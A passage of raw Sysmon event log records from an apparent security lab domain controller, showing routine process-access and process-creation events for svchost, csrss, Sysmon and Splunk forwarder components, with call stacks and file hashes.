13:45:18.040{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.040{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.040{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4AEE-6000-A505-000000009A01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.040{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AEE-6000-A505-000000009A01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.041{08A6967A-4AEE-6000-A505-000000009A01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:19.946{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AEF-6000-A705-000000009A01}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:19.946{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:19.946{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:19.946{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:19.946{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:19.946{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4AEF-6000-A705-000000009A01}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:19.946{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AEF-6000-A705-000000009A01}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:19.947{08A6967A-4AEF-6000-A705-000000009A01}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:30.150{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.948{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4B27-6000-A905-000000009A01}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.948{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.948{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.948{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.948{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.948{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4B27-6000-A905-000000009A01}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.948{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4B27-6000-A905-000000009A01}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.949{08A6967A-4B27-6000-A905-000000009A01}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.276{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4B27-6000-A805-000000009A01}4224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.276{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.276{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.276{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.276{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.276{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4B27-6000-A805-000000009A01}4224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.276{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4B27-6000-A805-000000009A01}4224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 